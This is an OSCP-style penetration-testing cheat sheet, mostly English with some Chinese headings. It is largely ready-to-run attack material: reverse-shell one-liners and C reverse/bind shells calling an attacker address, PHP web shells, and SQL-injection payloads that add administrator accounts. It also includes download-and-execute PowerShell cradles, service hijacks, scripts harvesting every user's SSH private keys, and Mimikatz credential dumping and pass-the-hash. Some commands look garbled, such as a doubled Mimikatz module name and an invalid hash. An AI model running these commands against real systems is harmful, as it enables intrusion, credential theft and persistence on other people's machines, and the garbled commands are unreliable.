OSCP Study Notes
I. Reconnaissance and Enumeration
1. Logging the engagement
Record the whole terminal session (commands and output) to a file for the report; type exit to stop recording:
script target.log
2. Port scanning
(1) Nmap
SYN scan, no ping, no DNS resolution, with OS/version detection, default scripts and traceroute:
nmap -sS -Pn -n -A x.x.x.x
Scan all UDP ports without retries (fast, but open|filtered results need a follow-up scan of the interesting ports):
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
(2) Nc
nc -nvv -w 1 -z x.x.x.x 1-100
(3) PowerShell
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
3. Host enumeration
(1) nikto -h x.x.x.x
(2) enum4linux x.x.x.x
(3) Detect whether a Windows host is 32-bit or 64-bit (queries MSRPC on port 135, no credentials needed)
Link:
https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py
python getArch.py -target x.x.x.x
4. DNS zone transfer
dig axfr domain.com @nameserver
5. Web directory fuzzing
(1) Gobuster
apt-get install seclists
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 20 -x .txt,.php
(Gobuster 3.x moved these flags under a subcommand: gobuster dir -u ... -w ...)
(2) Wfuzz (hide 400/404/500 responses)
wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
6. SMB enumeration
smbmap -H x.x.x.x
smbclient -L x.x.x.x
nmap --script=smb-check-vulns.nse x.x.x.x
(smb-check-vulns was removed from current Nmap releases; the replacement is the smb-vuln-* family, e.g. nmap --script=smb-vuln* -p 139,445 x.x.x.x)
smbmount //x.x.x.x/share /mnt -o username=xxx,workgroup=xxx
mount -t cifs //x.x.x.x/share /mnt
mount -t cifs -o username=xxx,password=xxx //x.x.x.x/share /mnt
smbclient \\\\x.x.x.x\\share
Anonymous (null session) login with rpcclient (-N suppresses the password prompt):
rpcclient -U "" -N x.x.x.x
7. SNMP enumeration
Walk the MIB with the default "public" community string:
snmpwalk -c public -v1 x.x.x.x
Kerberos user enumeration: the krb5-enum-users script sends a pre-authentication request for every candidate name in the wordlist; the KDC answers differently for existing and non-existing principals, which reveals valid usernames without any credentials
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
8. CMS
(1) cmsmap
cmsmap.py https://x.x.x.x
(2) wpscan
wpscan --url https://x.x.x.x
Brute-force a login (wpscan 2.x syntax; wpscan 3.x uses --passwords and --usernames instead)
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
9. SQL injection
(1) Common authentication-bypass payloads (match the quote style the query uses; the variants with brackets are for queries that wrap the condition in parentheses)
1' or '1'='1
1' or '1'='1'
1' or '1'='1'--
' or 1=1 --
a' or 1=1 --
" or 1=1 --
a" or 1=1 --
' or 1=1 #
" or 1=1 #
or 1=1 --
' or 'x'='x
" or "x"="x
') or ('x'='x
") or ("x"="x
(2) Find injectable parameters with time delays (compare the response time with and without the payload)
MSSQL:
';WAITFOR DELAY '0:0:5'--
MySQL:
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
+BENCHMARK(40000000,SHA1(1337))+
'%2Bbenchmark(3200,SHA1(1))%2B'
(3) If the MSSQL delay works, try enabling xp_cmdshell (requires sysadmin rights on the SQL instance)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
(4) Test xp_cmdshell with a ping back to your host (watch for the ICMP with tcpdump)
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
(5) Add a local administrator via xp_cmdshell
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD'; --
(6) Also add the account to the RDP group
';exec master..xp_cmdshell 'net user xxx Qwerty123! /ADD && net localgroup administrators xxx /ADD && net localgroup "Remote Desktop Users" xxx /ADD'; --
10. Local File Inclusion (LFI)
(1) Basic checks (%00 null-byte truncation only works on PHP < 5.3.4; %2500 is the double-URL-encoded form for when the application decodes twice)
Linux
../../../../../../../../../../etc/passwd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
../../../../../../../../../../etc/passwd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Windows (boot.ini exists only on XP/2003; the hosts file is present on every version)
../../../../../../../../../../boot.ini
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
../../../../../../../../../../boot.ini%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500

../../../../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
(2) LFI exploitation via PHP stream wrappers
(1) expect:// (requires the non-default expect extension)
http://x.x.x.x/blah?parameter=expect://whoami
(2) data:// (requires allow_url_include=On)
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
# the base64 encoded payload is: <? phpinfo(); ?>
(3) php://input (requires allow_url_include=On; the PHP code is sent in the POST body)
http://x.x.x.x/blah?parameter=php://input
# POST data (using Hackbar)
<? phpinfo(); ?>
11. Remote File Inclusion (RFI) (requires allow_url_include=On; serve phpinfo.php from your own web server)
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
12. Files and file systems
View the static mount table
cat /etc/fstab
Find directories writable by the current user
find / -writable -type d 2>/dev/null
Find files writable by the current user
find / -writable -type f 2>/dev/null
Find writable configuration files
find /etc/ -writable -type f 2>/dev/null
II. Getting a Shell
1. Shells
(1) Reverse shells
Bash
bash -i >& /dev/tcp/x.x.x.x/4444 0>&1
/bin/bash -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
/bin/sh -i > /dev/tcp/x.x.x.x/4444 0<&1 2>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="x.x.x.x";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl (Windows)
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PHP
php -r '$sock=fsockopen("x.x.x.x",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh x.x.x.x 4444
nc -e cmd.exe x.x.x.x 4444
/bin/sh | nc x.x.x.x 4444
Without -e (OpenBSD netcat), use a named pipe:
rm -f /tmp/p; mknod /tmp/p p && nc x.x.x.x 4444 0</tmp/p | /bin/sh >/tmp/p 2>&1
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0</tmp/p | /bin/sh 1>/tmp/p
telnet x.x.x.x 80 | /bin/bash | telnet x.x.x.x 443
Java (Groovy syntax)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Shellshock reverse shell
Verify the vulnerability by sending the function definition in the User-Agent header of a request to a CGI script
() { :; }; /bin/bash -c 'whoami'
Reverse shell
() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1;'
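Added example, not part of the original notes: both sides of the Shellshock technique above, a function that builds the User-Agent value with an arbitrary command, and detection logic that finds such attempts in web-server access logs. The log lines are constructed for the demo; the callback address is the page's x.x.x.x placeholder.

```python
"""Added example (not part of the original notes): build the Shellshock (CVE-2014-6271)
User-Agent payload and detect it in Apache-style access logs."""
import re


def shellshock_header(command):
    """User-Agent value carrying an exported-function definition followed by a command."""
    return "() { :; }; /bin/bash -c '%s'" % command


# The prefix vulnerable Bash parsed as a function definition; allow for the whitespace
# variations attackers use ("() {", "(){", "() {:;};").
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed access-log sample: two benign requests, one probe (whoami) and one
# reverse-shell attempt carried in the Referer field rather than the User-Agent.
CONSTRUCTED_LOG = """\
10.0.0.5 - - [10/Oct/2019:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2019:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :; }; /bin/bash -c 'whoami'"
10.0.0.9 - - [10/Oct/2019:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/x.x.x.x/4444 0>&1'" "curl/7.58"
10.0.0.7 - - [10/Oct/2019:13:56:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux)"
"""


def find_shellshock(log_text):
    """Return (line_number, client_ip) for every log line carrying the pattern in any field."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if SHELLSHOCK_RE.search(line):
            hits.append((n, line.split()[0]))
    return hits


if __name__ == "__main__":
    print(shellshock_header("whoami"))
    for n, ip in find_shellshock(CONSTRUCTED_LOG):
        print("line %d: Shellshock attempt from %s" % (n, ip))
```

The regex deliberately matches the whole line rather than only the User-Agent field, because any header the CGI handler exports as an environment variable (Referer, Cookie, custom headers) is an equally valid injection point.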
PowerShell
Invoke-PowerShellTcp
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Append to the bottom of the script so it fires as soon as the file is loaded:
Invoke-PowerShellTcp -Reverse -IPAddress x.x.x.x -Port 4444
C
// gcc reverse.c -o reverse

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
    int scktd;
    struct sockaddr_in client;

    memset(&client, 0, sizeof(client));
    client.sin_family = AF_INET;
    client.sin_addr.s_addr = inet_addr("x.x.x.x"); // attacker IP
    client.sin_port = htons(4444); // attacker port

    scktd = socket(AF_INET,SOCK_STREAM,0);
    if (scktd < 0 || connect(scktd,(struct sockaddr *)&client,sizeof(client)) < 0)
        return 1;

    // point the shell's standard streams at the socket
    dup2(scktd,0); // STDIN
    dup2(scktd,1); // STDOUT
    dup2(scktd,2); // STDERR

    execl("/bin/sh","sh","-i",(char *)NULL);

    return 0;
}
(2) Bind shells (listens on the target; the attacker connects to port 4444)
C
// gcc bind.c -o bind

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main (int argc, char **argv)
{
    int scktd = -1;
    int scktd_client = -1;
    socklen_t i;
    struct sockaddr_in server;
    struct sockaddr_in client;

    scktd = socket(AF_INET,SOCK_STREAM,0);
    if (scktd == -1)
        return -1;

    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_addr.s_addr = INADDR_ANY;
    server.sin_port = htons(4444); // local listening port

    if(bind(scktd,(struct sockaddr *)&server,sizeof(server)) < 0)
        return -2;

    listen(scktd,3);
    i = sizeof(struct sockaddr_in);
    scktd_client = accept(scktd,(struct sockaddr *)&client,&i);
    if (scktd_client < 0)
        return -3;

    // hand the accepted connection to the shell as its standard streams
    dup2(scktd_client,0); // STDIN
    dup2(scktd_client,1); // STDOUT
    dup2(scktd_client,2); // STDERR
    execl("/bin/sh","sh","-i",(char *)NULL);

    return 0;
}
(3) Web shells
PHP
<1> WordPress
Edit the active theme's 404 template (Appearance > Editor > 404.php), then request it with a cmd parameter
http://x.x.x.x/404.php?cmd=id
http://x.x.x.x/404.php?cmd=nc x.x.x.x 4444 -e /bin/sh
Code (the <? short-tag form only works with short_open_tag enabled)
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
<2> phpMyAdmin
<?php system("/usr/local/bin/wget http://x.x.x.x:4444/php-reverse-shell.php -O /var/tmp/hodor.php 2>&1"); ?>
<3> SQL query (write a web shell into the web root; needs the FILE privilege and a path the database user can write to; the PHP string was lost in the original rendering and is one of the one-liners above)
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"
LFI to reverse shell
Confirm the inclusion first:
http://x.x.x.x/blah?parameter=/etc/passwd%00
<1> POST request URL
http://x.x.x.x/blah?parameter=php://input%00
<2> POST data
<? phpinfo(); ?>
<3> POST data: reverse shell over port 443
<?php echo shell_exec("bash -i >& /dev/tcp/x.x.x.x/443 0>&1 2>&1"); ?>
HTTP methods
<1> HTTP POST (multipart upload form)
curl -X POST -F "file=@/location/shell.php" http://x.x.x.x/upload.php --cookie "cookie"
<2> HTTP PUT (when the server allows PUT; check the OPTIONS response)
curl -X PUT -d '<?php system($_GET["c"]);?>' http://x.x.x.x/shell.php
(4) Local SUID root shell (compile with gcc, then chown root and chmod u+s; setresuid is a GNU extension, hence _GNU_SOURCE)
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void){
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
2. File transfer
Python HTTP server (Python 2 module; Python 3 ships the equivalent http.server module)
python -m SimpleHTTPServer (default port 8000)
python -m SimpleHTTPServer 8001
Variant that also accepts uploads:
wget https://gist.githubusercontent.com/UniIsland/3346170/raw/059aca1d510c615df3d9fedafabac4d538ebe352/SimpleHTTPServerWithUpload.py ; chmod +x SimpleHTTPServerWithUpload.py; ./SimpleHTTPServerWithUpload.py
(1) Windows
<1> PowerShell
(New-Object System.Net.WebClient).DownloadFile("http://x.x.x.x:4444/file", "C:\Users\hodor\file")
PS C:\>IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x/Invoke-MS16032.ps1')
Download and run a remote script in memory (the SysNative path reaches the 64-bit PowerShell from a 32-bit process)
C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://x.x.x.x:8000/Invoke-PowerShellTcp.ps1')
<2> FTP
Method 1:
Configure pure-ftpd on Kali
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd hodor -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Start the FTP server on Kali
# FTP home dir = /ftphome/
/etc/init.d/pure-ftpd start
Download nc on the target non-interactively (ftp -s: reads its commands from a file; the second "hodor" is the password set with pure-pw above)
echo open x.x.x.x 21> test.txt
echo USER hodor>> test.txt
echo hodor>> test.txt
echo bin >> test.txt
echo GET nc.exe >> test.txt
echo bye >> test.txt
ftp -v -n -s:test.txt
Method 2
apt-get install python-pyftpdlib
python -m pyftpdlib -p 21
ftp x.x.x.x
get nc.exe
Then connect back from the target
nc.exe -nv x.x.x.x 4444 -e cmd.exe
C:\Inetpub\wwwroot\nc.exe -e cmd.exe x.x.x.x 4444
<3> RDP
Share a local folder into the session (it appears on the target as \\tsclient\share)
rdesktop x.x.x.x -r disk:share=/home/user/foldertoshare
<4> VBScript
Create the downloader line by line with echo (for hosts without PowerShell)
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run
cscript wget.vbs http://x.x.x.x/file.exe file.exe
(2) Linux
<1> Wget
wget http://x.x.x.x/blah.txt
wget http://x.x.x.x/blah.txt -O blah.txt
<2> Netcat
On the target (receiver)
nc -lvp 4444 > blah.txt
On the attacking machine (sender)
Method 1
nc x.x.x.x 4444 < blah.txt
Method 2
cat blah.txt | nc x.x.x.x 4444
<3> Python (Python 2)
python -c "import urllib; print urllib.urlopen('http://x.x.x.x:8000/ms11-080.py').read()" > ms11-080.py
III. Privilege Escalation
1. Windows
(1) Windows versions (the client and server version tables were images and did not survive extraction)
(2) Users
Current user
whoami
echo %username%
Which privileges the current user holds (look for SeImpersonatePrivilege, SeDebugPrivilege, SeBackupPrivilege)
whoami /priv
Which users exist
net users
Who is a local administrator
net localgroup administrators
Stored credentials (Credential Manager)
cmdkey /list
Currently cached Kerberos tickets (may also reveal other hosts and services in the domain)
klist
Are other users logged on (their sessions may be worth hijacking)
qwinsta
(3) Password hashes
Dump the local hashes with fgdump (needs administrator rights)
/usr/share/windows-binaries/fgdump/fgdump.exe
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump
fgdump link
FGDump - aldeid
If the host is domain-joined, search the Group Policy Preferences files in SYSVOL for "cpassword" (AES-encrypted with a published key, so trivially decryptable, e.g. with gpp-decrypt):
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
(4) Searching for passwords
dir /s *password*
findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*
Common files worth checking
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
(5) AlwaysInstallElevated
Check whether the registry value is 1 in both hives (both HKCU and HKLM must be set for the policy to take effect)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If so, every MSI is installed as SYSTEM: build a malicious MSI that adds a local user
msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi
msiexec /quiet /qn /i C:\hodor.msi
(6) Weak service permissions (upnphost example): point the service binary at netcat and run it as LocalSystem (requires that the current user may change the service configuration)
sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x 4444 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost
Error about a missing dependency?
sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost
Or remove the dependency altogether
sc config upnphost depend= ""
(7) Scheduled tasks
List scheduled tasks (look for tasks running as SYSTEM whose binaries or scripts are writable)
schtasks /query /fo LIST /v
List processes together with the services they host
tasklist /SVC
(8) PowerShell tools
<1> PowerUp.ps1
Checks the common Windows privilege-escalation vectors (service permissions, unquoted service paths, AlwaysInstallElevated, writable registry autoruns, etc.)
PowerTools/PowerUp.ps1 at master · PowerShellEmpire/PowerTools · GitHub
Download on the target
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')
Append to the bottom of the script
Invoke-AllChecks
Or run it manually
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\PowerUp.ps1
PS C:\> Invoke-AllChecks
<2> Sherlock.ps1 (matches the installed patches against known local privilege-escalation exploits)
Sherlock/Sherlock.ps1 at master · rasta-mouse/Sherlock · GitHub
IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')
Append to the bottom of the script
Find-AllVulns
Or run it manually
powershell.exe -nop -exec bypass
PS C:\> Import-Module .\Sherlock.ps1
PS C:\> Find-AllVulns
<3> Nishang
GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
(9)編譯
在linux上編譯exe
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
編譯python腳本為可執行檔案
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
(10)windows漏洞
<1> 遠程漏洞
ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050
<2> Local exploits
ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032
Links:
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.
https://github.com/SecWiki/windows-kernel-exploits
2. Linux
(1) Sudo
cat /etc/sudoers
sudo -l
Reading sudoers entries:
root may run any command, as any user, from any terminal:
root ALL=(ALL) ALL
user john may run /sbin/poweroff from any terminal after entering john's own password:
john ALL= /sbin/poweroff
user john may run scp as root from any terminal without a password (any binary that can spawn a program, as scp can, is a root shell; see GTFOBins):
john ALL = (root) NOPASSWD: /usr/bin/scp
(2) Distribution and kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
(3) Directories writable by default
/tmp
/dev/shm
(4) Searching for passwords
Search config.php
grep -R 'password' config.php
Search the whole file system
find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'
(5) Look for other writable directories/folders
(6) Services running as root
ps aux | grep root
ps -ef | grep root
(7) Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives/
ls -lah /var/cache/yum/
(8) Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
(9) Other methods
<1> Search inside files
grep -rnw '/etc/passwd' -e 'root'
<2> SSH
authorized_keys:
Public keys of every client allowed to log in; in other words, the SSH keys that may be used to log into the account whose home directory holds the file. The server uses it to authenticate users.
id_rsa
The client's private RSA key (usable with SSH protocol 1 or 2).
id_rsa.pub
The client's public RSA key.
id_dsa
The client's private DSA key (insecure; protocol 2 only).
id_dsa.pub
The client's public DSA key.
known_hosts
Host keys of every host the client has connected to.
<3> Find RSA private keys in every home directory listed in /etc/passwd
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
if [ -s "${X}/.ssh/id_rsa" ]; then
echo "### ${X}: "
cat "${X}/.ssh/id_rsa"
echo ""
fi
done
<4> Find DSA private keys
#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
if [ -s "${X}/.ssh/id_dsa" ]; then
echo "### ${X}: "
cat "${X}/.ssh/id_dsa"
echo ""
fi
done
<5> Find sticky-bit, SGID and SUID files
Sticky bit:
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000):
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000):
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or SGID (the parentheses are needed so that -type f applies to both branches)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
(10) Add a UID 0 user to /etc/passwd (only if the file is writable; the empty second field means no password, which some PAM configurations refuse for su/login)
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
(11) Enumeration tools
LinEnum.sh
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
linprivchecker.py
linpostexp/linprivchecker.py at master · reider-roque/linpostexp · GitHub
(12) Linux local exploits
kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)
(13) Precompiled exploits
https://github.com/SecWiki/linux-kernel-exploits
https://github.com/xairy/linux-kernel-exploitation
IV. Post-Exploitation
1. Proof.txt
(1) Linux
cat /root/proof.txt
(2) Windows
type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
2. Windows
(1) Add an RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add
(2) Enable RDP
Via the registry
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
Open the firewall (legacy netsh firewall syntax; Vista and later use netsh advfirewall)
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
(3) Connect over RDP
rdesktop -g 1024x768 x.x.x.x
(4)密碼與哈希
從lsass記憶體中提取密碼、密鑰、pin碼、票據
privilege::debug
log sekurlsa.log
sekurlsa::logonpasswords
Pass-the-hash
privilege::debug
log sekurlsa.log
sekurlsa::sekurlsa::pth /user:Administrator /domain:acme /ntlm:893efccda23744616cf7accab23ascbb /run:cmd
Elevate token
privilege::debug
log sekurlsa.log
token::elevate
Dump SAM
privilege::debug
log sekurlsa.log
lsadump::sam
Windows憑據編輯器(WCE):
安全工具,可用于從Windows主機中提取明文密碼和NTLM散列,需要管理員權限
Amplia Security - Research - Windows Credentials Editor (WCE)
C:\> wce -w
(5) Network
Connections and listening ports with owning PIDs
netstat -ano
Hosts file
C:\WINDOWS\System32\drivers\etc\hosts
Firewall configuration
